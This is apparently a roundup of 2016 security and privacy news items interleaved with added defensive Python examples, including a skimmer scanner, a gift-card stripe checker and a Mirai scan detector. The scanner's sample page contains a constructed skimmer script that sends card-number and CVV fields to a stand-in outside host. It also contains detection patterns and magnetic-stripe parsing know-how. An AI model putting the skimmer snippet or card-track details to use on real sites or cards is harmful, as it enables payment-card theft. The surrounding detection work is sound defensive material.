United States

Prosecutors Say Contractor Stole 50 Terabytes of NSA Data

An NSA contractor siphoned off dozens of hard drives' worth of data from government computers over two decades, prosecutors will allege on Friday. From a ZDNet report: The contractor, Harold T. Martin III, is also accused of stealing thousands of highly classified documents, computers, and other storage devices during his tenure at the agency. It's not known exactly what Martin allegedly stole, but a report from The New York Times on Wednesday suggests that the recently-leaked hacking tools used by the agency to conduct surveillance were among the stolen cache of files. Prosecutors will on Friday charge Martin with violating the Espionage Act. If convicted, he could face ten years in prison on each count. The charges, news of which was first reported by The Washington Post, outline a far deeper case than first thought, compared to the felony theft and a lesser misdemeanor charge of removal and retention of classified information revealed in an unsealed indictment last month.
Operating Systems

OMGUbuntu: 'Why Use Linux?' Answered in 3 Short Words

Linux-focused blog OMGUbuntu's Joey-Elijah Sneddon shared a post today in which he tries to explain why people should use Linux. He stumbled upon the question when he typed "Why use" and Google suggested Linux as one of the most frequent questions. From the article: The question posed is not one that I sincerely ask myself very often. The answer has, over the years, become complicated. It's grown into a bloated ball of elastic bands, each reason stretched around and now reliant on another. But I wanted to answer. Helpfully, my brain began to spit out all the predictable nouns: "Why use Linux? Because of security! Because of control! Because of privacy, community, and a general sense of purpose! Because it's fast! Because it's virus free! Because I'm dang-well used to it now! Because, heck, I can shape it to look like pretty much anything I want it to using themes and widgets and CSS and extensions and blingy little desktop trinkets!"

Your Dynamic IP Address Is Now Protected Personal Data Under EU Law

Europe's top court has ruled that dynamic IP addresses can constitute "personal data," just like static IP addresses, affording them some protection under EU law against being collected and stored by websites. ArsTechnica UK adds: But the Court of Justice of the European Union (CJEU) also said in its judgment on Wednesday that one legitimate reason for a site operator to store them is "to protect itself against cyberattacks." The case was referred to the CJEU by the German Federal Court of Justice, after an action brought by German Pirate Party politician Patrick Breyer. He asked the courts to grant an injunction to prevent websites that he consults, run by federal German bodies, from collecting and storing his dynamic IP addresses. Breyer's fear is that doing so would allow the German authorities to build up a picture of his interests. Site operators argue that they need to store the data in order to prevent "cybernetic attacks and make it possible to bring criminal proceedings" against those responsible, the CJEU said.

Traditional Keyboard Sounds Can Be Decoded By Listening Over a VoIP Connection, Researchers Say

Reader Trailrunner7 writes: Researchers have known for a long time that acoustic signals from keyboards can be intercepted and used to spy on users, but those attacks rely on grabbing the electronic emanation from the keyboard. New research from the University of California Irvine shows that an attacker, who has not compromised a target's PC, can record the acoustic emanations of a victim's keystrokes and later reconstruct the text of what he typed, simply by listening over a VoIP connection.

The researchers found that when connected to a target user on a Skype call, they could record the audio of the user's keystrokes. With a small amount of knowledge about the victim's typing style and the keyboard he's using, the researchers could accurately get 91.7 percent of keystrokes. The attack does not require any malware on the victim's machine and simply takes advantage of the way that VoIP software acquires acoustic emanations from the machine it's on.


DNA Testing For Jobs May Be On Its Way, Warns Gartner

Reader dcblogs writes: It is illegal today to use DNA testing for employment, but as science advances its understanding of genes that correlate to certain desirable traits -- such as leadership and intelligence -- business may want this information. People seeking leadership roles in business, or even those in search of funding for a start-up, may volunteer their DNA test results to demonstrate that they have the right aptitude, leadership capabilities and intelligence for the job. This may sound farfetched, but it's possible based on the direction of the science, according to Gartner analysts David Furlonger and Stephen Smith, who presented their research Wednesday at the firm's Symposium/ITxpo in Orlando. This research is called 'maverick' in Gartner parlance, meaning it has a somewhat low probability and is still years out, but its potential is nonetheless worrisome to the authors. It isn't as radical as it seems. Job selection on the basis of certain desirable genetic characteristics is already common in the military and sports. Even without testing, businesses, governments and others may use this understanding about how some characteristics are genetically determined to develop new interview methodologies and testing to help identify candidates predisposed to the traits they desire.

Half of American Adults Are In a Face-Recognition Database

An anonymous reader quotes a report from Ars Technica: Half of American adults are in a face-recognition database, according to a Georgetown University study released Wednesday. That means there are about 117 million adults in a law enforcement facial-recognition database, the study by Georgetown's Center on Privacy and Technology says. The report (PDF), titled "The Perpetual Line-up: Unregulated Police Face Recognition in America," shows that one-fourth of the nation's law enforcement agencies have access to face-recognition databases, and their use by those agencies is virtually unregulated. Where do the mug shots come from? For starters, about 16 states allow the FBI to use facial recognition to compare faces of suspected criminals to their driver's licenses or ID photos, according to the study. "In this line-up," the study says, "it's not a human that points to the suspect -- it's an algorithm." The study says 26 states or more allow police agencies to "run or request searches" against their databases or driver's licenses and ID photos. This equates to "roughly one in two American adults has their photos searched this way," according to the study. Many local police agencies also insert mug shots of people they arrest into searchable, biometric databases, according to the report. According to the report, researchers obtained documents stating that at least five "major police departments," including those in Chicago, Dallas, and Los Angeles, "either claimed to run real-time face recognition off of street cameras, bought technology that can do so, or expressed an interest in buying it." The Georgetown report's release comes three months after the U.S. Government Accountability Office (GAO) concluded that the FBI has access to as many as 411.9 million images as part of its face-recognition database.
The study also mentioned that the police departments have little oversight of their databases and don't audit them for misuse: "Maryland's system, which includes the license photos of over two million residents, was launched in 2011. It has never been audited. The Pinellas County Sheriff's Office system is almost 15 years old and may be the most frequently used system in the country. When asked if his office audits searches for misuse, Sheriff Bob Gualtieri replied, "No, not really." Despite assurances to Congress, the FBI has not audited use of its face recognition system, either. Only nine of 52 agencies (17%) indicated that they log and audit their officers' face recognition searches for improper use. Of those, only one agency, the Michigan State Police, provided documentation showing that their audit regime was actually functional."
The Almighty Buck

It's Entirely Reasonable For Police To Swipe a Suspicious Gift Card, Says Court

An anonymous reader quotes Ars Technica: A U.S. federal appeals court has found that law enforcement can, without a warrant, swipe credit cards and gift cards to reveal the information encoded on the magnetic stripe. It's the third such federal appellate court to reach this conclusion. Last week, the 5th U.S. Circuit Court of Appeals found in favor of the government in United States v. Turner, establishing that it was entirely reasonable for Texas police officers to scan approximately 100 gift cards found in a car that was pulled over at a traffic stop. Like the previous similar 8th Circuit case that Ars covered in June 2016, the defendants challenged the search of the gift cards as being unreasonable. (The second case was from the 3rd Circuit in July 2015, in a case known as U.S. v. Bah.) In this case, after pulling over the car and running the IDs of both men, police found that there was an outstanding warrant for the passenger, Courtland Turner. When Turner was told to get out of the car and was placed in the patrol car, the officer returned to the stopped car and noticed an "opaque plastic bag partially protruding from the front passenger seat," as if someone had tried to push it under the seat to keep it hidden. The cop then asked the driver, Broderick Henderson, what was in the bag. Henderson replied that they had bought gift cards. When the officer then asked if he had receipts for them, Henderson replied that they had "bought the gift cards from another individual who sells them to make money." Turner's lawyers later challenged the scanning, arguing that this "search" of these gift cards went against their client's "reasonable expectation of privacy," an argument that neither the district court nor the appellate court found convincing. The 5th Circuit summarized: "After conferring with other officers about past experiences with stolen gift cards, the officer seized the gift cards as evidence of suspected criminal activity. 
Henderson was ticketed for failing to display a driver's license and signed an inventory sheet that had an entry for 143 gift cards. Turner was arrested pursuant to his warrant. The officer, without obtaining a search warrant, swiped the gift cards with his in-car computer. Unable to make use of the information shown, the officer turned the gift cards over to the Secret Service. A subsequent scan of the gift cards revealed that at least forty-three were altered, meaning the numbers encoded in the card did not match the numbers printed on the card. The investigating officer also contacted the stores where the gift cards were purchased -- a grocery store and a Walmart in Bryan, Texas provided photos of Henderson and Turner purchasing gift cards."
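The "altered" finding in the opinion above is a simple comparison: the account number encoded on the magnetic stripe is read back and checked against the number printed on the card. The block below is an added example of that check, not code from the court record, Ars or any investigator's tooling. It assumes the stripe reader hands back raw Track 1 / Track 2 strings in the ISO/IEC 7813 layout, and the sample cards are constructed with public test-range numbers rather than real accounts.

```python
"""Added example (not from the 5th Circuit opinion, Ars or any investigator's
tooling): parse the data a reader pulls off a card's magnetic stripe and compare
the encoded account number (PAN) with the number printed on the card. Track
layouts follow ISO/IEC 7813; the sample cards are constructed and use public
test-range numbers, not real accounts."""
import re
from typing import Dict, List, Optional

# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(
    r"^%B(?P<pan>\d{1,19})\^(?P<name>[^^]{2,26})\^(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>[^?]*)\?$")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(
    r"^;(?P<pan>\d{1,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>[^?]*)\?$")


def luhn_ok(digits: str) -> bool:
    """Luhn check digit used by card numbers; a failing PAN was never a valid account."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def parse_track(track: str) -> Optional[Dict[str, str]]:
    """Return the named fields of a Track 1 or Track 2 string, or None if it is neither."""
    for rx in (TRACK1_RE, TRACK2_RE):
        m = rx.match(track.strip())
        if m:
            return m.groupdict()
    return None


def check_card(printed_number: str, tracks: List[str]) -> Dict:
    """'altered' means the stripe carries a PAN other than the one printed on the card."""
    printed = re.sub(r"\D", "", printed_number)
    encoded = {p["pan"] for p in map(parse_track, tracks) if p}
    if not encoded:
        return {"status": "unreadable", "printed": printed, "encoded": []}
    # Two tracks that disagree with each other are also a sign of re-encoding.
    status = "match" if encoded == {printed} else "altered"
    return {"status": status, "printed": printed, "encoded": sorted(encoded),
            "luhn_ok": all(luhn_ok(p) for p in encoded)}


# Constructed batch: one untouched gift card, one re-encoded with a different PAN,
# and one whose stripe could not be read.
SAMPLE_CARDS = [
    ("6011 0000 0000 0004", ["%B6011000000000004^GIFT CARD^20121011234567?",
                             ";6011000000000004=2012101123456?"]),
    ("6011 0000 0000 0004", [";4111111111111111=2012101123456?"]),
    ("6011 0000 0000 0004", ["no stripe read"]),
]


def count_altered(cards) -> int:
    """Number of cards in a batch whose encoded PAN differs from the printed one."""
    return sum(1 for printed, tracks in cards
               if check_card(printed, tracks)["status"] == "altered")
```

A card that fails the Luhn check as well as the printed-number comparison was most likely re-encoded by hand or with a bad dump; one that passes Luhn but still mismatches is the more interesting case, since the stripe then carries somebody else's valid account.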

Hackers Steal Credit Card Data From Visitors of US Senate GOP Committee Website

pdclarry writes: While all of the recent news has been about hacking the Democratic National Committee, apparently the Republicans have also been hacked over many months (since March 2016). This was not about politics, however; it was to steal credit card numbers. Brian Krebs reports: "a report this past week out of The Netherlands suggests Russian hackers have for the past six months been siphoning credit card data from visitors to the web storefront of the National Republican Senatorial Committee (NRSC). [...] If you purchased a 'Never Hillary' poster or donated funds to the NRSC through its website between March 2016 and the first week of this month [October 2016], there's an excellent chance that your payment card data was siphoned by malware and is now for sale in the cybercrime underground." Krebs says his information comes from Dutch researcher Willem De Groot, co-founder and head of security at a Dutch e-commerce site. The Republicans were not alone; theirs was just one of 5,900 e-commerce sites hacked by the same Russian actors. You can view De Groot's analysis of the malware planted on the NRSC's site and other services here. Krebs adds: "The NRSC did not respond to multiple requests for comment, but a cached copy of the site's source code from October 5, 2016 indicates the malicious code was on the site at the time (load this link, click 'view source' and then Ctrl-F for '')."

UK Police Begins Deployment of 22,000 Police Body Cameras

An anonymous reader writes: London's Metropolitan Police Service has begun a roll-out of 22,000 Body Worn Video (BWV) cameras to officers over the city's 32 boroughs after ten years of country-wide trials. The device, which records video only when the officer decides, has a 130-degree field of view and a 30-second buffer which permits police to begin recording even after an event has started. The makers of the camera also provide an Android/iOS app which can allow a remote viewer to connect to an officer's camera, effectively turning police operatives into walking CCTVs. Academic research has suggested that use of BWV cams can reduce complaints against officers by 93%, and the Met contends that the new technology, whose cloud-based systems erase unwanted videos after 31 days, is particularly effective in domestic violence cases.

Journalists Face Jail Time After Reporting on North Dakota Pipeline Protest

Investigative reporter and co-founder of Democracy Now!, Amy Goodman, is now facing riot charges in the state of North Dakota after her report on a Native American-led pipeline protest there went viral on Facebook. From a TechCrunch report: Democracy Now! issued a statement about the new charges against Goodman late Saturday. Goodman's story, posted to Facebook on September 4th, has been viewed more than 14 million times on the social media platform, Democracy Now! said, and was picked up by mainstream media outlets and networks including CBS, NBC, NPR, CNN, MSNBC and The Huffington Post. Additionally, documentary filmmaker Deia Schlosberg is facing felony and conspiracy charges that could carry a 45-year sentence for filming at the protest, IndieWire reports.
United Kingdom

UK Security Agencies Unlawfully Collected Data For 17 Years, Court Rules

British security agencies have secretly and unlawfully collected massive volumes of confidential personal data, including financial information, on citizens for more than a decade, top judges have ruled. The Guardian adds: The investigatory powers tribunal, which is the only court that hears complaints against MI5, MI6 and GCHQ, said the security services operated secret regimes to collect vast amounts of personal communications data, tracking individual phone and web use and large datasets of confidential personal information, without adequate safeguards or supervision for more than 10 years. The ruling said the regime governing the collection of bulk communications data (BCD) -- the who, where, when and what of personal phone and web communications -- failed to comply with article 8 protecting the right to privacy of the European convention of human rights (ECHR) between 1998, when it started, and 4 November 2015, when it was made public. It said the holding of bulk personal datasets (BPD) -- which might include medical and tax records, individual biographical details, commercial and financial activities, communications and travel data -- also failed to comply with article 8 for the decade it was in operation until its public avowal in March 2015.

Assange Internet Link Cut By State Actor, Claims Wikileaks

An anonymous reader shares a report by Russia Today: WikiLeaks has activated "contingency plans" after its co-founder's internet service was intentionally cut off by a state actor, the media organization said in a tweet. The internet is one of the few, if not only, available ways for Julian Assange, who has been locked up in the Ecuadorian Embassy in London for more than four years, to maintain contact with the outside world. Facing extradition to Sweden over allegations of rape, which he denies, the Australian computer programmer has been holed up in the embassy in West London since 2012. He claims the extradition is actually a bid to move him to a jurisdiction from which he can then be sent to the US, which is known to be actively investigating WikiLeaks. The unverified claims of state sabotage come as WikiLeaks continues to release damaging documents, most recently thousands of hacked emails from Hillary Clinton's campaign manager John Podesta.

The Slashdot Interview With Security Expert Mikko Hypponen: 'Backupception'

You asked, he answered!

Mikko Hypponen, Chief Research Officer at security firm F-Secure, has answered a range of your questions. Read on to find his insight on the kind of security awareness training we need, whether anti-virus products are relevant anymore, and whether we have already lost the battle to bad guys. Bonus: his take on whether or not you should take backups of your data.

Google Reveals It Received Secret FBI Subpoena

An anonymous reader quotes a report from The Intercept: Google revealed Wednesday it had been released from an FBI gag order that came with a secret demand for its customers' personal information. The FBI secret subpoena, known as a national security letter, does not require court approval. Investigators simply need to clear a low internal bar demonstrating that the information is "relevant to an authorized investigation to protect against international terrorism or clandestine intelligence activities." The national security letter issued to Google was mentioned without fanfare in Google's latest bi-annual transparency report, which includes information on government requests for data the company received from around the world in the first half of 2016. Google received the secret subpoena in the first half of 2015, according to the report. An accompanying blog post titled "Building on Surveillance Reform," also identified new countries that made requests -- Algeria, Belarus, and Saudi Arabia among them -- and reveals that Google saw an increase in requests made under the Foreign Intelligence Surveillance Act. But Google in its short blog post did not publish the contents of the actual letter the way other companies, including Yahoo, have done in recent months. Asked about plans to release the national security letter, a Google spokesperson told The Intercept it will release it, though it wouldn't say when or in what form it will do so. Google hasn't previously published any national security letters, though it's possible gag orders for prior demands are still in place. It's also unclear why Google wouldn't immediately publish the document -- unless the gag is only partially lifted, or the company is involved in ongoing litigation to challenge the order, neither of which were cited as reasons for holding it back.

Hackers Hit 6,000 Sites On Active 18-Month Carding Spree

mask.of.sanity writes from a report via The Register: Hackers have installed skimming scripts on more than 6,000 online stores and are adding 85 each day in a wide-scale active operation that may have compromised hundreds of thousands of credit cards. The malware is infecting stores (full list) running vulnerable versions of the Magento ecommerce platform, and also compromised the U.S. National Republican Senatorial Committee store. "Given that there are [about] 5,900 other skimmed stores, and the malpractice has been going on since at least May last year, I would expect the number of stolen cards in the hundreds of thousands," said Dutch developer Willem de Groot. You can read his blog post to learn more.
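Both the NRSC story above and this one come down to the same artefact: a script injected into a store's checkout page that reads the card fields and posts them to a host the store does not own, which is what shows up when you view the cached source. The block below is an added example of a heuristic check over saved page source, not de Groot's scanner or any code from the affected sites. It assumes you have the HTML on disk and know the store's own hostname; the page, the skimmer-like snippet and every domain in it are constructed for the example and do not reproduce the real malware.

```python
"""Added example, not de Groot's scanner or any code from the affected sites:
a heuristic check over a saved copy of a store's HTML source that flags scripts
with the hallmarks of a payment-form skimmer: references to card fields, a
request to a host outside the store's own domain, and obfuscation helpers.
The HTML and the domains below are constructed for the example."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

CARD_FIELD_RE = re.compile(
    r"(cc[_-]?number|card[_-]?number|cvv|cvc|exp(iry|iration)?[_-]?(month|year|date)|cardholder)", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s'\"<>]*")
OBFUSCATION_RE = re.compile(
    r"(eval\(|unescape\(|String\.fromCharCode|atob\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2})", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src or None, inline body) in document order."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _is_foreign(host, first_party):
    return bool(host) and host != first_party and not host.endswith("." + first_party)


def foreign_hosts(text, first_party):
    """Hostnames referenced in `text` that are not the store or one of its subdomains."""
    return {urlparse(u).hostname for u in URL_RE.findall(text)
            if _is_foreign(urlparse(u).hostname, first_party)}


def scan_page(html_text, first_party):
    """Return findings for off-site script tags and inline scripts that look like skimmers."""
    collector = ScriptCollector()
    collector.feed(html_text)
    findings = []
    for idx, (src, body) in enumerate(collector.scripts):
        if src:
            host = urlparse(src).hostname
            if _is_foreign(host, first_party):
                findings.append({"script": idx, "kind": "external", "host": host})
            continue
        reasons = []
        if CARD_FIELD_RE.search(body):
            reasons.append("card-fields")
        hosts = foreign_hosts(body, first_party)
        if hosts:
            reasons.append("exfil-host:" + ",".join(sorted(hosts)))
        if OBFUSCATION_RE.search(body):
            reasons.append("obfuscation")
        # A benign checkout script rarely touches card fields *and* calls out off-site.
        if len(reasons) >= 2:
            findings.append({"script": idx, "kind": "inline", "reasons": reasons})
    return findings


# Constructed page: two first-party script tags, one skimmer-like inline script,
# and one harmless first-party inline script.
SAMPLE_HTML = """<html><head>
<script src="https://shop.example/js/checkout.js"></script>
<script src="https://cdn.shop.example/js/vendor.js"></script>
</head><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function(){
  var d = {n: document.getElementsByName('cc_number')[0].value,
           c: document.getElementsByName('cvv')[0].value};
  new Image().src = 'https://stats-collector.invalid/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
<script>
new Image().src = 'https://shop.example/pixel.gif';
</script>
</body></html>"""
```

Run `scan_page(open("cached.html").read(), "yourstore.example")` against a saved copy. The two-reason threshold keeps a first-party analytics beacon or a legitimate card-field validator from tripping the check on its own; a script that both reads card inputs and calls out to a third-party host is worth reading line by line regardless of what the filename claims it is.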

DHS Warns of Mirai Botnet Threat To Cellular Modems

chicksdaddy writes from a report via The Security Ledger: The Mirai malware that is behind massive denial of service attacks involving hundreds of thousands of "Internet of Things" devices may also affect cellular modems that connect those devices to the internet, the Department of Homeland Security (DHS) is warning. An alert issued by DHS's Industrial Control System CERT on Wednesday warned that cellular gateways manufactured by Sierra Wireless are vulnerable to compromise by the Mirai malware. While the routers are not actively being targeted by the malware, "unchanged default factory credentials, which are publicly available, could allow the devices to be compromised," ICS-CERT warned. The alert comes after a number of reports identified devices infected with the Mirai malware as the source of massive denial of service attacks against media websites like Krebs on Security and the French hosting company OVH. The attacks emanated from a global network of hundreds of thousands of infected IP-enabled closed circuit video cameras, digital video recorders (DVRs), network video recorders (NVRs) and other devices. Analysis by the firm Imperva found that Mirai is purpose-built to infect Internet of Things devices and enlist them in distributed denial of service (DDoS) attacks. The malware searches broadly for insecure or weakly secured IoT devices that can be remotely accessed and broken into with easily guessed (factory default) usernames and passwords. The report adds: "Sierra said in an alert that the company has 'confirmed reports of the 'Mirai' malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet.' Sierra Wireless LS300, GX400, GX/ES440, GX/ES450, and RV50 were identified in the bulletin as vulnerable to compromise by Mirai. Furthermore, devices attached to the gateway's local area network may also be vulnerable to infection by the Mirai malware, ICS-CERT warned.
Sierra Wireless asked affected users to reboot their gateway. Mirai is memory resident malware, meaning that it is erased upon reboot. Furthermore, administrators were advised to change the password to the management interface by logging in locally, or remotely to a vulnerable device."
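A reboot clears the running copy, but a gateway that is still reachable with its default password will simply be found again; the thing to watch for between the reboot and the password change is the propagation behaviour itself, a device opening connections to many addresses on the telnet ports. The block below is an added detection example over connection-log lines, not code from DHS, ICS-CERT, Sierra Wireless or the Mirai source. It assumes a key=value log format of the kind a firewall or flow exporter emits; the format, addresses and traffic in it are constructed for the example.

```python
"""Added example, not from DHS, ICS-CERT, Sierra Wireless or the Mirai source:
a detector that runs over connection-log lines and flags an internal host that
behaves like a Mirai-infected device, i.e. one that opens TCP connections to
many distinct addresses on the telnet ports (23 and 2323) within a short window.
The log format and addresses below are constructed for the example."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)\s+proto=(?P<proto>\w+)")
TELNET_PORTS = {23, 2323}
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line):
    """Return the fields of one constructed log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], TS_FMT), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "proto": m["proto"]}


def detect_telnet_scanners(lines, window=timedelta(seconds=60), min_targets=20):
    """Map each source that reached >= min_targets distinct telnet destinations
    inside any `window` to the peak number of distinct destinations seen."""
    events = defaultdict(list)  # src -> [(timestamp, dst), ...]
    for line in lines:
        e = parse_line(line)
        if e and e["proto"] == "tcp" and e["dport"] in TELNET_PORTS:
            events[e["src"]].append((e["ts"], e["dst"]))
    flagged = {}
    for src, evs in events.items():
        evs.sort()
        peak = 0
        for i, (t0, _) in enumerate(evs):
            # Distinct destinations in the window that starts at this event.
            targets = {d for t, d in evs[i:] if t - t0 <= window}
            peak = max(peak, len(targets))
        if peak >= min_targets:
            flagged[src] = peak
    return flagged


def _constructed_log():
    base = datetime(2016, 10, 12, 14, 3, 0)
    lines = []
    # 10.0.5.17 behaves like an infected device: 40 distinct targets in 20 seconds.
    for i in range(40):
        ts = (base + timedelta(seconds=i // 2)).strftime(TS_FMT)
        port = 23 if i % 3 else 2323
        lines.append(f"{ts} src=10.0.5.17 dst=203.0.113.{i + 1} dport={port} proto=tcp action=deny")
    # 10.0.5.20 is an admin workstation that talks telnet to the same two switches.
    for i in range(10):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f"{ts} src=10.0.5.20 dst=10.0.0.{1 + i % 2} dport=23 proto=tcp action=allow")
    # Unrelated HTTPS traffic that the detector must ignore.
    lines.append(f"{base.strftime(TS_FMT)} src=10.0.5.21 dst=198.51.100.7 dport=443 proto=tcp action=allow")
    return lines


SAMPLE_LOG = _constructed_log()
```

The threshold separates a scanner from an operator who legitimately uses telnet to a handful of devices: what matters is the count of distinct destinations in a short window, not the count of connections. Tune `min_targets` to the network; on a segment where nothing should speak telnet at all, a threshold of one is reasonable.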

Yahoo Patents Smart Billboard That Would Deliver Targeted Ads To Passersby or Motorists

An anonymous reader writes: Yahoo has filed a patent for advertising billboards outfitted with a wide array of sensors -- including drone-based cameras -- which would use facial and vehicle recognition, data brokers, cell-tower information and social network information to attempt to identify worthwhile advertising targets and aim personalized ads at them as they pass on foot or in cars. The scheme, which was submitted on October 6th, anticipates using the same kind of micro-auction processes that currently determine which ads users see in webpages and mobile apps. The implementation of public ad-targeting brings up some fascinating and chilling prospects, as users find that the ads which "bloom" around them betray much about their private lives. Yahoo provides an example via its patent application: "According to one example, a digital billboard adjacent a busy freeway might be instrumented with or located near traffic sensors that detect information about the context of the vehicles approaching the billboard, e.g., the number and average speed of the vehicles. Such information might be used in conjunction with information about the time of day and/or the day of the week (e.g., Monday morning rush hour) to select advertisements for display that would appeal to an expected demographic and to display the advertisements for durations that are commensurate with the level of traffic congestion." The patent application also mentions how it will gather required information from individuals: "Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. 
Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic."

Senator Wants Nationwide, All-Mail Voting To Counter Election Hacks

An anonymous reader quotes a report from Ars Technica: In the wake of the Obama administration's announcement that the Russian government directed hacks on the Democratic National Committee and other institutions to influence U.S. elections, a senator from Oregon says the nation should conduct its elections like his home state does: all-mail voting. In an e-mail, Sen. Ron Wyden, a Democrat, told Ars: "We should not underestimate how dangerous... attacks on election systems could be. If a foreign state were to eliminate registration records for a particular group of Americans immediately before an election, they could very likely disenfranchise those Americans and swing the results of an election. Recent efforts by some states to make it more difficult to vote only serves to increase the danger of such attacks. This is why I have proposed taking Oregon's unique vote-by-mail system nationwide to protect our democratic process against foreign and domestic attacks." The only states to hold all elections entirely by mail are Oregon, Washington, and Colorado, according to the National Conference of State Legislatures. More than a dozen others have various provisions for mail voting. The National Conference of State Legislatures has a breakdown here on how Americans cast their votes across the union. Wyden co-sponsored the Vote By Mail Act in July, and he did so for reasons at the time that were unconnected to cybersecurity. Instead, the measure was originally proposed to help minorities and others cast ballots. The plan requires the U.S. Postal Service to deliver ballots to all registered voters. Voters could also register to vote when applying for driver's licenses. The measure fell on deaf ears this year and didn't even get a committee vote. A Wyden spokesperson said the proposal will have a "better chance" next year if Democrats win a majority of Senate seats.

US Military Is Looking At Blockchain Technology To Secure Nuclear Weapons

Lasrick quotes a report from Quartz: Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the U.S. Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites. The report adds: "The case for using a blockchain boils down to a concept in computer security known as 'information integrity.' That's basically being able to track when a system or piece of data has been viewed or modified. In DARPA's case, blockchain tech could offer crucial intelligence on whether a hacker has modified something in a database, or whether they're surveilling a particular military system. This September, DARPA, which stands for Defense Advanced Research Projects Agency (the agency helped create the internet, among other things), awarded a $1.8 million contract to a computer security firm called Galois. The firm's assignment is to formally verify -- a sort of computer-code audit, using mathematics -- a particular type of blockchain tech supplied by a company called Guardtime. Formal verification is one way to build nearly unhackable code, and it's a big part of DARPA's approach to security. If the verification goes well, it could inch DARPA closer to using some form of blockchain technology for the military, DARPA's program manager behind the blockchain effort, Timothy Booher, said. 'We're certainly thinking through a lot of applications,' he says. 'As Galois does its verification work and we understand at a deep level the security properties of this [technology] then I would start to set up a series of meetings [with the rest of the agency] to start that dialog.'"
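The "information integrity" property the Quartz piece describes, knowing whether a record has been modified after the fact, does not need a full blockchain to illustrate; the core of it is a hash chain whose head is witnessed somewhere the attacker cannot rewrite. The block below is an added example of that mechanism, not DARPA's, Galois's or Guardtime's code, and says nothing about how Guardtime's product actually works. It assumes SHA-256 from the standard library and that the chain head is published to a second party after each append; the audit records in it are constructed.

```python
"""Added example, not DARPA's, Galois's or Guardtime's code: a hash-chained,
append-only record that gives the 'information integrity' property described in
the article, namely that modification, reordering or truncation of past entries
is detectable by anyone who re-walks the chain against a witnessed head.
Uses SHA-256 from the standard library; the records are constructed."""
import copy
import hashlib
import json

GENESIS = "0" * 64


def _hash_entry(prev_hash, index, payload):
    # Canonical JSON so the same logical record always hashes the same way.
    body = json.dumps({"prev": prev_hash, "index": index, "payload": payload},
                      sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(body.encode()).hexdigest()


class HashChain:
    """Append-only log where every entry commits to the hash of the one before it."""
    def __init__(self):
        self.entries = []  # each: {"index", "prev", "payload", "hash"}

    def append(self, payload):
        prev = self.head()
        idx = len(self.entries)
        h = _hash_entry(prev, idx, payload)
        self.entries.append({"index": idx, "prev": prev, "payload": payload, "hash": h})
        return h

    def head(self):
        return self.entries[-1]["hash"] if self.entries else GENESIS


def verify_chain(entries, expected_head=None):
    """Return (ok, first_bad_index). Passing the witnessed head also catches truncation."""
    prev = GENESIS
    for i, e in enumerate(entries):
        if e["index"] != i or e["prev"] != prev:
            return False, i  # reordered, spliced or missing entry
        if _hash_entry(prev, i, e["payload"]) != e["hash"]:
            return False, i  # payload rewritten after the fact
        prev = e["hash"]
    if expected_head is not None and prev != expected_head:
        return False, len(entries)  # chain is internally consistent but shorter than witnessed
    return True, None


def demo():
    """Build a three-entry access log, witness its head, then tamper with copies of it."""
    chain = HashChain()
    for rec in ({"actor": "ops1", "action": "read", "object": "sat-config-7"},
                {"actor": "ops2", "action": "modify", "object": "sat-config-7"},
                {"actor": "ops1", "action": "read", "object": "sat-config-7"}):
        chain.append(rec)
    witnessed = chain.head()  # assumed to be published out-of-band after each append
    tampered = copy.deepcopy(chain.entries)
    tampered[1]["payload"]["actor"] = "ops1"  # rewrite who made the modification
    truncated = copy.deepcopy(chain.entries[:-1])  # drop the last entry entirely
    return {"intact": verify_chain(chain.entries, witnessed),
            "tampered": verify_chain(tampered, witnessed),
            "truncated": verify_chain(truncated, witnessed)}
```

The caveat a practitioner should take from this is in `verify_chain`: without the witnessed head, the truncated chain verifies cleanly, because an attacker who controls the whole store can recompute every hash after the point of change. The integrity guarantee comes from the head being held by a party the attacker cannot reach, which is the role the article's "blockchain" plays, not from the hashing itself.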

White House Vows 'Proportional' Response For Russian DNC Hack

